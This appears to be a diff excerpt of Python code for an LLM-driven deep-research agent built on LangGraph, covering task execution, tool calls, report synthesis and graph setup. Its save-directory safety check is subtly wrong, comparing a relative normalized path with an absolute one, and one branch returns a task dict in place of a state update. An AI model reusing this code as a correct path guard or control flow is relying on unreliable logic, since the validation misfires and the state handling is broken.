| 593 |
+
f"Skipping invalid task data: {task_desc} in category {category_data['category_name']}")
|
| 594 |
+
|
| 595 |
+
new_plan.append(
|
| 596 |
+
ResearchCategoryItem(
|
| 597 |
+
category_name=category_data["category_name"],
|
| 598 |
+
tasks=tasks,
|
| 599 |
+
)
|
| 600 |
+
)
|
| 601 |
+
|
| 602 |
+
if not new_plan:
|
| 603 |
+
logger.error("LLM failed to generate a valid plan structure from JSON.")
|
| 604 |
+
return {"error_message": "Failed to generate research plan structure."}
|
| 605 |
+
|
| 606 |
+
logger.info(f"Generated research plan with {len(new_plan)} categories.")
|
| 607 |
+
_save_plan_to_md(new_plan, output_dir) # Save the hierarchical plan
|
| 608 |
+
|
| 609 |
+
return {
|
| 610 |
+
"research_plan": new_plan,
|
| 611 |
+
"current_category_index": 0,
|
| 612 |
+
"current_task_index_in_category": 0,
|
| 613 |
+
"search_results": [],
|
| 614 |
+
}
|
| 615 |
+
|
| 616 |
+
except json.JSONDecodeError as e:
|
| 617 |
+
logger.error(f"Failed to parse JSON from LLM for plan: {e}. Response was: {raw_content}", exc_info=True)
|
| 618 |
+
return {"error_message": f"LLM generated invalid JSON for research plan: {e}"}
|
| 619 |
+
except Exception as e:
|
| 620 |
+
logger.error(f"Error during planning: {e}", exc_info=True)
|
| 621 |
+
return {"error_message": f"LLM Error during planning: {e}"}
|
| 622 |
+
|
| 623 |
+
|
| 624 |
+
async def research_execution_node(state: DeepResearchState) -> Dict[str, Any]:
|
| 625 |
+
logger.info("--- Entering Research Execution Node ---")
|
| 626 |
+
if state.get("stop_requested"):
|
| 627 |
+
logger.info("Stop requested, skipping research execution.")
|
| 628 |
+
return {
|
| 629 |
+
"stop_requested": True,
|
| 630 |
+
"current_category_index": state["current_category_index"],
|
| 631 |
+
"current_task_index_in_category": state["current_task_index_in_category"],
|
| 632 |
+
}
|
| 633 |
+
|
| 634 |
+
plan = state["research_plan"]
|
| 635 |
+
cat_idx = state["current_category_index"]
|
| 636 |
+
task_idx = state["current_task_index_in_category"]
|
| 637 |
+
llm = state["llm"]
|
| 638 |
+
tools = state["tools"]
|
| 639 |
+
output_dir = str(state["output_dir"])
|
| 640 |
+
task_id = state["task_id"] # For _AGENT_STOP_FLAGS
|
| 641 |
+
|
| 642 |
+
# This check should ideally be handled by `should_continue`
|
| 643 |
+
if not plan or cat_idx >= len(plan):
|
| 644 |
+
logger.info("Research plan complete or categories exhausted.")
|
| 645 |
+
return {} # should route to synthesis
|
| 646 |
+
|
| 647 |
+
current_category = plan[cat_idx]
|
| 648 |
+
if task_idx >= len(current_category["tasks"]):
|
| 649 |
+
logger.info(f"All tasks in category '{current_category['category_name']}' completed. Moving to next category.")
|
| 650 |
+
# This logic is now effectively handled by should_continue and the index updates below
|
| 651 |
+
# The next iteration will be caught by should_continue or this node with updated indices
|
| 652 |
+
return {
|
| 653 |
+
"current_category_index": cat_idx + 1,
|
| 654 |
+
"current_task_index_in_category": 0,
|
| 655 |
+
"messages": state["messages"] # Pass messages along
|
| 656 |
+
}
|
| 657 |
+
|
| 658 |
+
current_task = current_category["tasks"][task_idx]
|
| 659 |
+
|
| 660 |
+
if current_task["status"] == "completed":
|
| 661 |
+
logger.info(
|
| 662 |
+
f"Task '{current_task['task_description']}' in category '{current_category['category_name']}' already completed. Skipping.")
|
| 663 |
+
# Logic to find next task
|
| 664 |
+
next_task_idx = task_idx + 1
|
| 665 |
+
next_cat_idx = cat_idx
|
| 666 |
+
if next_task_idx >= len(current_category["tasks"]):
|
| 667 |
+
next_cat_idx += 1
|
| 668 |
+
next_task_idx = 0
|
| 669 |
+
return {
|
| 670 |
+
"current_category_index": next_cat_idx,
|
| 671 |
+
"current_task_index_in_category": next_task_idx,
|
| 672 |
+
"messages": state["messages"] # Pass messages along
|
| 673 |
+
}
|
| 674 |
+
|
| 675 |
+
logger.info(
|
| 676 |
+
f"Executing research task: '{current_task['task_description']}' (Category: '{current_category['category_name']}')"
|
| 677 |
+
)
|
| 678 |
+
|
| 679 |
+
llm_with_tools = llm.bind_tools(tools)
|
| 680 |
+
|
| 681 |
+
# Construct messages for LLM invocation
|
| 682 |
+
task_prompt_content = (
|
| 683 |
+
f"Current Research Category: {current_category['category_name']}\n"
|
| 684 |
+
f"Specific Task: {current_task['task_description']}\n\n"
|
| 685 |
+
"Please use the available tools, especially 'parallel_browser_search', to gather information for this specific task. "
|
| 686 |
+
"Provide focused search queries relevant ONLY to this task. "
|
| 687 |
+
"If you believe you have sufficient information from previous steps for this specific task, you can indicate that you are ready to summarize or that no further search is needed."
|
| 688 |
+
)
|
| 689 |
+
current_task_message_history = [
|
| 690 |
+
HumanMessage(content=task_prompt_content)
|
| 691 |
+
]
|
| 692 |
+
if not state["messages"]: # First actual execution message
|
| 693 |
+
invocation_messages = [
|
| 694 |
+
SystemMessage(
|
| 695 |
+
content="You are a research assistant executing one task of a research plan. Focus on the current task only."),
|
| 696 |
+
] + current_task_message_history
|
| 697 |
+
else:
|
| 698 |
+
invocation_messages = state["messages"] + current_task_message_history
|
| 699 |
+
|
| 700 |
+
try:
|
| 701 |
+
logger.info(f"Invoking LLM with tools for task: {current_task['task_description']}")
|
| 702 |
+
ai_response: BaseMessage = await llm_with_tools.ainvoke(invocation_messages)
|
| 703 |
+
logger.info("LLM invocation complete.")
|
| 704 |
+
|
| 705 |
+
tool_results = []
|
| 706 |
+
executed_tool_names = []
|
| 707 |
+
current_search_results = state.get("search_results", []) # Get existing search results
|
| 708 |
+
|
| 709 |
+
if not isinstance(ai_response, AIMessage) or not ai_response.tool_calls:
|
| 710 |
+
logger.warning(
|
| 711 |
+
f"LLM did not call any tool for task '{current_task['task_description']}'. Response: {ai_response.content[:100]}..."
|
| 712 |
+
)
|
| 713 |
+
current_task["status"] = "pending" # Or "completed_no_tool" if LLM explains it's done
|
| 714 |
+
current_task["result_summary"] = f"LLM did not use a tool. Response: {ai_response.content}"
|
| 715 |
+
current_task["current_category_index"] = cat_idx
|
| 716 |
+
current_task["current_task_index_in_category"] = task_idx
|
| 717 |
+
return current_task
|
| 718 |
+
# We still save the plan and advance.
|
| 719 |
+
else:
|
| 720 |
+
# Process tool calls
|
| 721 |
+
for tool_call in ai_response.tool_calls:
|
| 722 |
+
tool_name = tool_call.get("name")
|
| 723 |
+
tool_args = tool_call.get("args", {})
|
| 724 |
+
tool_call_id = tool_call.get("id")
|
| 725 |
+
|
| 726 |
+
logger.info(f"LLM requested tool call: {tool_name} with args: {tool_args}")
|
| 727 |
+
executed_tool_names.append(tool_name)
|
| 728 |
+
selected_tool = next((t for t in tools if t.name == tool_name), None)
|
| 729 |
+
|
| 730 |
+
if not selected_tool:
|
| 731 |
+
logger.error(f"LLM called tool '{tool_name}' which is not available.")
|
| 732 |
+
tool_results.append(
|
| 733 |
+
ToolMessage(content=f"Error: Tool '{tool_name}' not found.", tool_call_id=tool_call_id))
|
| 734 |
+
continue
|
| 735 |
+
|
| 736 |
+
try:
|
| 737 |
+
stop_event = _AGENT_STOP_FLAGS.get(task_id)
|
| 738 |
+
if stop_event and stop_event.is_set():
|
| 739 |
+
logger.info(f"Stop requested before executing tool: {tool_name}")
|
| 740 |
+
current_task["status"] = "pending" # Or a new "stopped" status
|
| 741 |
+
_save_plan_to_md(plan, output_dir)
|
| 742 |
+
return {"stop_requested": True, "research_plan": plan, "current_category_index": cat_idx,
|
| 743 |
+
"current_task_index_in_category": task_idx}
|
| 744 |
+
|
| 745 |
+
logger.info(f"Executing tool: {tool_name}")
|
| 746 |
+
tool_output = await selected_tool.ainvoke(tool_args)
|
| 747 |
+
logger.info(f"Tool '{tool_name}' executed successfully.")
|
| 748 |
+
|
| 749 |
+
if tool_name == "parallel_browser_search":
|
| 750 |
+
current_search_results.extend(tool_output) # tool_output is List[Dict]
|
| 751 |
+
else: # For other tools, we might need specific handling or just log
|
| 752 |
+
logger.info(f"Result from tool '{tool_name}': {str(tool_output)[:200]}...")
|
| 753 |
+
# Storing non-browser results might need a different structure or key in search_results
|
| 754 |
+
current_search_results.append(
|
| 755 |
+
{"tool_name": tool_name, "args": tool_args, "output": str(tool_output),
|
| 756 |
+
"status": "completed"})
|
| 757 |
+
|
| 758 |
+
tool_results.append(ToolMessage(content=json.dumps(tool_output), tool_call_id=tool_call_id))
|
| 759 |
+
|
| 760 |
+
except Exception as e:
|
| 761 |
+
logger.error(f"Error executing tool '{tool_name}': {e}", exc_info=True)
|
| 762 |
+
tool_results.append(
|
| 763 |
+
ToolMessage(content=f"Error executing tool {tool_name}: {e}", tool_call_id=tool_call_id))
|
| 764 |
+
current_search_results.append(
|
| 765 |
+
{"tool_name": tool_name, "args": tool_args, "status": "failed", "error": str(e)})
|
| 766 |
+
|
| 767 |
+
# After processing all tool calls for this task
|
| 768 |
+
step_failed_tool_execution = any("Error:" in str(tr.content) for tr in tool_results)
|
| 769 |
+
# Consider a task successful if a browser search was attempted and didn't immediately error out during call
|
| 770 |
+
# The browser search itself returns status for each query.
|
| 771 |
+
browser_tool_attempted_successfully = "parallel_browser_search" in executed_tool_names and not step_failed_tool_execution
|
| 772 |
+
|
| 773 |
+
if step_failed_tool_execution:
|
| 774 |
+
current_task["status"] = "failed"
|
| 775 |
+
current_task[
|
| 776 |
+
"result_summary"] = f"Tool execution failed. Errors: {[tr.content for tr in tool_results if 'Error' in str(tr.content)]}"
|
| 777 |
+
elif executed_tool_names: # If any tool was called
|
| 778 |
+
current_task["status"] = "completed"
|
| 779 |
+
current_task["result_summary"] = f"Executed tool(s): {', '.join(executed_tool_names)}."
|
| 780 |
+
# TODO: Could ask LLM to summarize the tool_results for this task if needed, rather than just listing tools.
|
| 781 |
+
else: # No tool calls but AI response had .tool_calls structure (empty)
|
| 782 |
+
current_task["status"] = "failed" # Or a more specific status
|
| 783 |
+
current_task["result_summary"] = "LLM prepared for tool call but provided no tools."
|
| 784 |
+
|
| 785 |
+
# Save progress
|
| 786 |
+
_save_plan_to_md(plan, output_dir)
|
| 787 |
+
_save_search_results_to_json(current_search_results, output_dir)
|
| 788 |
+
|
| 789 |
+
# Determine next indices
|
| 790 |
+
next_task_idx = task_idx + 1
|
| 791 |
+
next_cat_idx = cat_idx
|
| 792 |
+
if next_task_idx >= len(current_category["tasks"]):
|
| 793 |
+
next_cat_idx += 1
|
| 794 |
+
next_task_idx = 0
|
| 795 |
+
|
| 796 |
+
updated_messages = state["messages"] + current_task_message_history + [ai_response] + tool_results
|
| 797 |
+
|
| 798 |
+
return {
|
| 799 |
+
"research_plan": plan,
|
| 800 |
+
"search_results": current_search_results,
|
| 801 |
+
"current_category_index": next_cat_idx,
|
| 802 |
+
"current_task_index_in_category": next_task_idx,
|
| 803 |
+
"messages": updated_messages,
|
| 804 |
+
}
|
| 805 |
+
|
| 806 |
+
except Exception as e:
|
| 807 |
+
logger.error(f"Unhandled error during research execution for task '{current_task['task_description']}': {e}",
|
| 808 |
+
exc_info=True)
|
| 809 |
+
current_task["status"] = "failed"
|
| 810 |
+
_save_plan_to_md(plan, output_dir)
|
| 811 |
+
# Determine next indices even on error to attempt to move on
|
| 812 |
+
next_task_idx = task_idx + 1
|
| 813 |
+
next_cat_idx = cat_idx
|
| 814 |
+
if next_task_idx >= len(current_category["tasks"]):
|
| 815 |
+
next_cat_idx += 1
|
| 816 |
+
next_task_idx = 0
|
| 817 |
+
return {
|
| 818 |
+
"research_plan": plan,
|
| 819 |
+
"current_category_index": next_cat_idx,
|
| 820 |
+
"current_task_index_in_category": next_task_idx,
|
| 821 |
+
"error_message": f"Core Execution Error on task '{current_task['task_description']}': {e}",
|
| 822 |
+
"messages": state["messages"] + current_task_message_history # Preserve messages up to error
|
| 823 |
+
}
|
| 824 |
+
|
| 825 |
+
|
| 826 |
+
async def synthesis_node(state: DeepResearchState) -> Dict[str, Any]:
|
| 827 |
+
"""Synthesizes the final report from the collected search results."""
|
| 828 |
+
logger.info("--- Entering Synthesis Node ---")
|
| 829 |
+
if state.get("stop_requested"):
|
| 830 |
+
logger.info("Stop requested, skipping synthesis.")
|
| 831 |
+
return {"stop_requested": True}
|
| 832 |
+
|
| 833 |
+
llm = state["llm"]
|
| 834 |
+
topic = state["topic"]
|
| 835 |
+
search_results = state.get("search_results", [])
|
| 836 |
+
output_dir = state["output_dir"]
|
| 837 |
+
plan = state["research_plan"] # Include plan for context
|
| 838 |
+
|
| 839 |
+
if not search_results:
|
| 840 |
+
logger.warning("No search results found to synthesize report.")
|
| 841 |
+
report = f"# Research Report: {topic}\n\nNo information was gathered during the research process."
|
| 842 |
+
_save_report_to_md(report, output_dir)
|
| 843 |
+
return {"final_report": report}
|
| 844 |
+
|
| 845 |
+
logger.info(
|
| 846 |
+
f"Synthesizing report from {len(search_results)} collected search result entries."
|
| 847 |
+
)
|
| 848 |
+
|
| 849 |
+
# Prepare context for the LLM
|
| 850 |
+
# Format search results nicely, maybe group by query or original plan step
|
| 851 |
+
formatted_results = ""
|
| 852 |
+
references = {}
|
| 853 |
+
ref_count = 1
|
| 854 |
+
for i, result_entry in enumerate(search_results):
|
| 855 |
+
query = result_entry.get("query", "Unknown Query") # From parallel_browser_search
|
| 856 |
+
tool_name = result_entry.get("tool_name") # From other tools
|
| 857 |
+
status = result_entry.get("status", "unknown")
|
| 858 |
+
result_data = result_entry.get("result") # From BrowserUseAgent's final_result
|
| 859 |
+
tool_output_str = result_entry.get("output") # From other tools
|
| 860 |
+
|
| 861 |
+
if tool_name == "parallel_browser_search" and status == "completed" and result_data:
|
| 862 |
+
# result_data is the summary from BrowserUseAgent
|
| 863 |
+
formatted_results += f'### Finding from Web Search Query: "{query}"\n'
|
| 864 |
+
formatted_results += f"- **Summary:**\n{result_data}\n" # result_data is already a summary string here
|
| 865 |
+
# If result_data contained title/URL, you'd format them here.
|
| 866 |
+
# The current BrowserUseAgent returns a string summary directly as 'final_data' in run_single_browser_task
|
| 867 |
+
formatted_results += "---\n"
|
| 868 |
+
elif tool_name != "parallel_browser_search" and status == "completed" and tool_output_str:
|
| 869 |
+
formatted_results += f'### Finding from Tool: "{tool_name}" (Args: {result_entry.get("args")})\n'
|
| 870 |
+
formatted_results += f"- **Output:**\n{tool_output_str}\n"
|
| 871 |
+
formatted_results += "---\n"
|
| 872 |
+
elif status == "failed":
|
| 873 |
+
error = result_entry.get("error")
|
| 874 |
+
q_or_t = f"Query: \"{query}\"" if query != "Unknown Query" else f"Tool: \"{tool_name}\""
|
| 875 |
+
formatted_results += f'### Failed {q_or_t}\n'
|
| 876 |
+
formatted_results += f"- **Error:** {error}\n"
|
| 877 |
+
formatted_results += "---\n"
|
| 878 |
+
|
| 879 |
+
# Prepare the research plan context
|
| 880 |
+
plan_summary = "\nResearch Plan Followed:\n"
|
| 881 |
+
for cat_idx, category in enumerate(plan):
|
| 882 |
+
plan_summary += f"\n#### Category {cat_idx + 1}: {category['category_name']}\n"
|
| 883 |
+
for task_idx, task in enumerate(category['tasks']):
|
| 884 |
+
marker = "[x]" if task["status"] == "completed" else "[ ]" if task["status"] == "pending" else "[-]"
|
| 885 |
+
plan_summary += f" - {marker} {task['task_description']}\n"
|
| 886 |
+
|
| 887 |
+
synthesis_prompt = ChatPromptTemplate.from_messages(
|
| 888 |
+
[
|
| 889 |
+
(
|
| 890 |
+
"system",
|
| 891 |
+
"""You are a professional researcher tasked with writing a comprehensive and well-structured report based on collected findings.
|
| 892 |
+
The report should address the research topic thoroughly, synthesizing the information gathered from various sources.
|
| 893 |
+
Structure the report logically:
|
| 894 |
+
1. Briefly introduce the topic and the report's scope (mentioning the research plan followed, including categories and tasks, is good).
|
| 895 |
+
2. Discuss the key findings, organizing them thematically, possibly aligning with the research categories. Analyze, compare, and contrast information.
|
| 896 |
+
3. Summarize the main points and offer concluding thoughts.
|
| 897 |
+
|
| 898 |
+
Ensure the tone is objective and professional.
|
| 899 |
+
If findings are contradictory or incomplete, acknowledge this.
|
| 900 |
+
""", # Removed citation part for simplicity for now, as browser agent returns summaries.
|
| 901 |
+
),
|
| 902 |
+
(
|
| 903 |
+
"human",
|
| 904 |
+
f"""
|
| 905 |
+
**Research Topic:** {topic}
|
| 906 |
+
|
| 907 |
+
{plan_summary}
|
| 908 |
+
|
| 909 |
+
**Collected Findings:**
|
| 910 |
+
```
|
| 911 |
+
{formatted_results}
|
| 912 |
+
```
|
| 913 |
+
|
| 914 |
+
Please generate the final research report in Markdown format based **only** on the information above.
|
| 915 |
+
""",
|
| 916 |
+
),
|
| 917 |
+
]
|
| 918 |
+
)
|
| 919 |
+
|
| 920 |
+
try:
|
| 921 |
+
response = await llm.ainvoke(
|
| 922 |
+
synthesis_prompt.format_prompt(
|
| 923 |
+
topic=topic,
|
| 924 |
+
plan_summary=plan_summary,
|
| 925 |
+
formatted_results=formatted_results,
|
| 926 |
+
).to_messages()
|
| 927 |
+
)
|
| 928 |
+
final_report_md = response.content
|
| 929 |
+
|
| 930 |
+
# Append the reference list automatically to the end of the generated markdown
|
| 931 |
+
if references:
|
| 932 |
+
report_references_section = "\n\n## References\n\n"
|
| 933 |
+
# Sort refs by ID for consistent output
|
| 934 |
+
sorted_refs = sorted(references.values(), key=lambda x: x["id"])
|
| 935 |
+
for ref in sorted_refs:
|
| 936 |
+
report_references_section += (
|
| 937 |
+
f"[{ref['id']}] {ref['title']} - {ref['url']}\n"
|
| 938 |
+
)
|
| 939 |
+
final_report_md += report_references_section
|
| 940 |
+
|
| 941 |
+
logger.info("Successfully synthesized the final report.")
|
| 942 |
+
_save_report_to_md(final_report_md, output_dir)
|
| 943 |
+
return {"final_report": final_report_md}
|
| 944 |
+
|
| 945 |
+
except Exception as e:
|
| 946 |
+
logger.error(f"Error during report synthesis: {e}", exc_info=True)
|
| 947 |
+
return {"error_message": f"LLM Error during synthesis: {e}"}
|
| 948 |
+
|
| 949 |
+
|
| 950 |
+
# --- Langgraph Edges and Conditional Logic ---
|
| 951 |
+
|
| 952 |
+
|
| 953 |
+
def should_continue(state: DeepResearchState) -> str:
|
| 954 |
+
logger.info("--- Evaluating Condition: Should Continue? ---")
|
| 955 |
+
if state.get("stop_requested"):
|
| 956 |
+
logger.info("Stop requested, routing to END.")
|
| 957 |
+
return "end_run"
|
| 958 |
+
if state.get("error_message") and "Core Execution Error" in state["error_message"]: # Critical error in node
|
| 959 |
+
logger.warning(f"Critical error detected: {state['error_message']}. Routing to END.")
|
| 960 |
+
return "end_run"
|
| 961 |
+
|
| 962 |
+
plan = state.get("research_plan")
|
| 963 |
+
cat_idx = state.get("current_category_index", 0)
|
| 964 |
+
task_idx = state.get("current_task_index_in_category", 0) # This is the *next* task to check
|
| 965 |
+
|
| 966 |
+
if not plan:
|
| 967 |
+
logger.warning("No research plan found. Routing to END.")
|
| 968 |
+
return "end_run"
|
| 969 |
+
|
| 970 |
+
# Check if the current indices point to a valid pending task
|
| 971 |
+
if cat_idx < len(plan):
|
| 972 |
+
current_category = plan[cat_idx]
|
| 973 |
+
if task_idx < len(current_category["tasks"]):
|
| 974 |
+
# We are trying to execute the task at plan[cat_idx]["tasks"][task_idx]
|
| 975 |
+
# The research_execution_node will handle if it's already completed.
|
| 976 |
+
logger.info(
|
| 977 |
+
f"Plan has potential pending tasks (next up: Category {cat_idx}, Task {task_idx}). Routing to Research Execution."
|
| 978 |
+
)
|
| 979 |
+
return "execute_research"
|
| 980 |
+
else: # task_idx is out of bounds for current category, means we need to check next category
|
| 981 |
+
if cat_idx + 1 < len(plan): # If there is a next category
|
| 982 |
+
logger.info(
|
| 983 |
+
f"Finished tasks in category {cat_idx}. Moving to category {cat_idx + 1}. Routing to Research Execution."
|
| 984 |
+
)
|
| 985 |
+
# research_execution_node will update state to {current_category_index: cat_idx + 1, current_task_index_in_category: 0}
|
| 986 |
+
# Or rather, the previous execution node already set these indices to the start of the next category.
|
| 987 |
+
return "execute_research"
|
| 988 |
+
|
| 989 |
+
# If we've gone through all categories and tasks (cat_idx >= len(plan))
|
| 990 |
+
logger.info("All plan categories and tasks processed or current indices are out of bounds. Routing to Synthesis.")
|
| 991 |
+
return "synthesize_report"
|
| 992 |
+
|
| 993 |
+
|
| 994 |
+
# --- DeepSearchAgent Class ---
|
| 995 |
+
|
| 996 |
+
|
| 997 |
+
class DeepResearchAgent:
|
| 998 |
+
def __init__(
|
| 999 |
+
self,
|
| 1000 |
+
llm: Any,
|
| 1001 |
+
browser_config: Dict[str, Any],
|
| 1002 |
+
mcp_server_config: Optional[Dict[str, Any]] = None,
|
| 1003 |
+
):
|
| 1004 |
+
"""
|
| 1005 |
+
Initializes the DeepSearchAgent.
|
| 1006 |
+
|
| 1007 |
+
Args:
|
| 1008 |
+
llm: The Langchain compatible language model instance.
|
| 1009 |
+
browser_config: Configuration dictionary for the BrowserUseAgent tool.
|
| 1010 |
+
Example: {"headless": True, "window_width": 1280, ...}
|
| 1011 |
+
mcp_server_config: Optional configuration for the MCP client.
|
| 1012 |
+
"""
|
| 1013 |
+
self.llm = llm
|
| 1014 |
+
self.browser_config = browser_config
|
| 1015 |
+
self.mcp_server_config = mcp_server_config
|
| 1016 |
+
self.mcp_client = None
|
| 1017 |
+
self.stopped = False
|
| 1018 |
+
self.graph = self._compile_graph()
|
| 1019 |
+
self.current_task_id: Optional[str] = None
|
| 1020 |
+
self.stop_event: Optional[threading.Event] = None
|
| 1021 |
+
self.runner: Optional[asyncio.Task] = None # To hold the asyncio task for run
|
| 1022 |
+
|
| 1023 |
+
async def _setup_tools(
|
| 1024 |
+
self, task_id: str, stop_event: threading.Event, max_parallel_browsers: int = 1
|
| 1025 |
+
) -> List[Tool]:
|
| 1026 |
+
"""Sets up the basic tools (File I/O) and optional MCP tools."""
|
| 1027 |
+
tools = [
|
| 1028 |
+
WriteFileTool(),
|
| 1029 |
+
ReadFileTool(),
|
| 1030 |
+
ListDirectoryTool(),
|
| 1031 |
+
] # Basic file operations
|
| 1032 |
+
browser_use_tool = create_browser_search_tool(
|
| 1033 |
+
llm=self.llm,
|
| 1034 |
+
browser_config=self.browser_config,
|
| 1035 |
+
task_id=task_id,
|
| 1036 |
+
stop_event=stop_event,
|
| 1037 |
+
max_parallel_browsers=max_parallel_browsers,
|
| 1038 |
+
)
|
| 1039 |
+
tools += [browser_use_tool]
|
| 1040 |
+
# Add MCP tools if config is provided
|
| 1041 |
+
if self.mcp_server_config:
|
| 1042 |
+
try:
|
| 1043 |
+
logger.info("Setting up MCP client and tools...")
|
| 1044 |
+
if not self.mcp_client:
|
| 1045 |
+
self.mcp_client = await setup_mcp_client_and_tools(
|
| 1046 |
+
self.mcp_server_config
|
| 1047 |
+
)
|
| 1048 |
+
mcp_tools = self.mcp_client.get_tools()
|
| 1049 |
+
logger.info(f"Loaded {len(mcp_tools)} MCP tools.")
|
| 1050 |
+
tools.extend(mcp_tools)
|
| 1051 |
+
except Exception as e:
|
| 1052 |
+
logger.error(f"Failed to set up MCP tools: {e}", exc_info=True)
|
| 1053 |
+
elif self.mcp_server_config:
|
| 1054 |
+
logger.warning(
|
| 1055 |
+
"MCP server config provided, but setup function unavailable."
|
| 1056 |
+
)
|
| 1057 |
+
tools_map = {tool.name: tool for tool in tools}
|
| 1058 |
+
return tools_map.values()
|
| 1059 |
+
|
| 1060 |
+
async def close_mcp_client(self):
|
| 1061 |
+
if self.mcp_client:
|
| 1062 |
+
await self.mcp_client.__aexit__(None, None, None)
|
| 1063 |
+
self.mcp_client = None
|
| 1064 |
+
|
| 1065 |
+
def _compile_graph(self) -> StateGraph:
|
| 1066 |
+
"""Compiles the Langgraph state machine."""
|
| 1067 |
+
workflow = StateGraph(DeepResearchState)
|
| 1068 |
+
|
| 1069 |
+
# Add nodes
|
| 1070 |
+
workflow.add_node("plan_research", planning_node)
|
| 1071 |
+
workflow.add_node("execute_research", research_execution_node)
|
| 1072 |
+
workflow.add_node("synthesize_report", synthesis_node)
|
| 1073 |
+
workflow.add_node(
|
| 1074 |
+
"end_run", lambda state: logger.info("--- Reached End Run Node ---") or {}
|
| 1075 |
+
) # Simple end node
|
| 1076 |
+
|
| 1077 |
+
# Define edges
|
| 1078 |
+
workflow.set_entry_point("plan_research")
|
| 1079 |
+
|
| 1080 |
+
workflow.add_edge(
|
| 1081 |
+
"plan_research", "execute_research"
|
| 1082 |
+
) # Always execute after planning
|
| 1083 |
+
|
| 1084 |
+
# Conditional edge after execution
|
| 1085 |
+
workflow.add_conditional_edges(
|
| 1086 |
+
"execute_research",
|
| 1087 |
+
should_continue,
|
| 1088 |
+
{
|
| 1089 |
+
"execute_research": "execute_research", # Loop back if more steps
|
| 1090 |
+
"synthesize_report": "synthesize_report", # Move to synthesis if done
|
| 1091 |
+
"end_run": "end_run", # End if stop requested or error
|
| 1092 |
+
},
|
| 1093 |
+
)
|
| 1094 |
+
|
| 1095 |
+
workflow.add_edge("synthesize_report", "end_run") # End after synthesis
|
| 1096 |
+
|
| 1097 |
+
app = workflow.compile()
|
| 1098 |
+
return app
|
| 1099 |
+
|
| 1100 |
+
async def run(
|
| 1101 |
+
self,
|
| 1102 |
+
topic: str,
|
| 1103 |
+
task_id: Optional[str] = None,
|
| 1104 |
+
save_dir: str = "./tmp/deep_research",
|
| 1105 |
+
max_parallel_browsers: int = 1,
|
| 1106 |
+
) -> Dict[str, Any]:
|
| 1107 |
+
"""
|
| 1108 |
+
Starts the deep research process (Async Generator Version).
|
| 1109 |
+
|
| 1110 |
+
Args:
|
| 1111 |
+
topic: The research topic.
|
| 1112 |
+
task_id: Optional existing task ID to resume. If None, a new ID is generated.
|
| 1113 |
+
|
| 1114 |
+
Yields:
|
| 1115 |
+
Intermediate state updates or messages during execution.
|
| 1116 |
+
"""
|
| 1117 |
+
if self.runner and not self.runner.done():
|
| 1118 |
+
logger.warning(
|
| 1119 |
+
"Agent is already running. Please stop the current task first."
|
| 1120 |
+
)
|
| 1121 |
+
# Return an error status instead of yielding
|
| 1122 |
+
return {
|
| 1123 |
+
"status": "error",
|
| 1124 |
+
"message": "Agent already running.",
|
| 1125 |
+
"task_id": self.current_task_id,
|
| 1126 |
+
}
|
| 1127 |
+
|
| 1128 |
+
self.current_task_id = task_id if task_id else str(uuid.uuid4())
|
| 1129 |
+
safe_root_dir = "./tmp/deep_research"
|
| 1130 |
+
normalized_save_dir = os.path.normpath(save_dir)
|
| 1131 |
+
if not normalized_save_dir.startswith(os.path.abspath(safe_root_dir)):
|
| 1132 |
+
logger.warning(f"Unsafe save_dir detected: {save_dir}. Using default directory.")
|
| 1133 |
+
normalized_save_dir = os.path.abspath(safe_root_dir)
|
| 1134 |
+
output_dir = os.path.join(normalized_save_dir, self.current_task_id)
|
| 1135 |
+
os.makedirs(output_dir, exist_ok=True)
|
| 1136 |
+
|
| 1137 |
+
logger.info(
|
| 1138 |
+
f"[AsyncGen] Starting research task ID: {self.current_task_id} for topic: '{topic}'"
|
| 1139 |
+
)
|
| 1140 |
+
logger.info(f"[AsyncGen] Output directory: {output_dir}")
|
| 1141 |
+
|
| 1142 |
+
self.stop_event = threading.Event()
|
| 1143 |
+
_AGENT_STOP_FLAGS[self.current_task_id] = self.stop_event
|
| 1144 |
+
agent_tools = await self._setup_tools(
|
| 1145 |
+
self.current_task_id, self.stop_event, max_parallel_browsers
|
| 1146 |
+
)
|
| 1147 |
+
initial_state: DeepResearchState = {
|
| 1148 |
+
"task_id": self.current_task_id,
|
| 1149 |
+
"topic": topic,
|
| 1150 |
+
"research_plan": [],
|
| 1151 |
+
"search_results": [],
|
| 1152 |
+
"messages": [],
|
| 1153 |
+
"llm": self.llm,
|
| 1154 |
+
"tools": agent_tools,
|
| 1155 |
+
"output_dir": Path(output_dir),
|
| 1156 |
+
"browser_config": self.browser_config,
|
| 1157 |
+
"final_report": None,
|
| 1158 |
+
"current_category_index": 0,
|
| 1159 |
+
"current_task_index_in_category": 0,
|
| 1160 |
+
"stop_requested": False,
|
| 1161 |
+
"error_message": None,
|
| 1162 |
+
}
|
| 1163 |
+
|
| 1164 |
+
if task_id:
|
| 1165 |
+
logger.info(f"Attempting to resume task {task_id}...")
|
| 1166 |
+
loaded_state = _load_previous_state(task_id, output_dir)
|
| 1167 |
+
initial_state.update(loaded_state)
|
| 1168 |
+
if loaded_state.get("research_plan"):
|
| 1169 |
+
logger.info(
|
| 1170 |
+
f"Resuming with {len(loaded_state['research_plan'])} plan categories "
|
| 1171 |
+
f"and {len(loaded_state.get('search_results', []))} existing results. "
|
| 1172 |
+
f"Next task: Cat {initial_state['current_category_index']}, Task {initial_state['current_task_index_in_category']}"
|
| 1173 |
+
)
|
| 1174 |
+
initial_state["topic"] = (
|
| 1175 |
+
topic # Allow overriding topic even when resuming? Or use stored topic? Let's use new one.
|
| 1176 |
+
)
|
| 1177 |
+
else:
|
| 1178 |
+
logger.warning(
|
| 1179 |
+
f"Resume requested for {task_id}, but no previous plan found. Starting fresh."
|
| 1180 |
+
)
|
| 1181 |
+
|
| 1182 |
+
# --- Execute Graph using ainvoke ---
|
| 1183 |
+
final_state = None
|
| 1184 |
+
status = "unknown"
|
| 1185 |
+
message = None
|
| 1186 |
+
try:
|
| 1187 |
+
logger.info(f"Invoking graph execution for task {self.current_task_id}...")
|
| 1188 |
+
self.runner = asyncio.create_task(self.graph.ainvoke(initial_state))
|
| 1189 |
+
final_state = await self.runner
|
| 1190 |
+
logger.info(f"Graph execution finished for task {self.current_task_id}.")
|
| 1191 |
+
|
| 1192 |
+
# Determine status based on final state
|
| 1193 |
+
if self.stop_event and self.stop_event.is_set():
|
| 1194 |
+
status = "stopped"
|
| 1195 |
+
message = "Research process was stopped by request."
|
| 1196 |
+
logger.info(message)
|
| 1197 |
+
elif final_state and final_state.get("error_message"):
|
| 1198 |
+
status = "error"
|
| 1199 |
+
message = final_state["error_message"]
|
| 1200 |
+
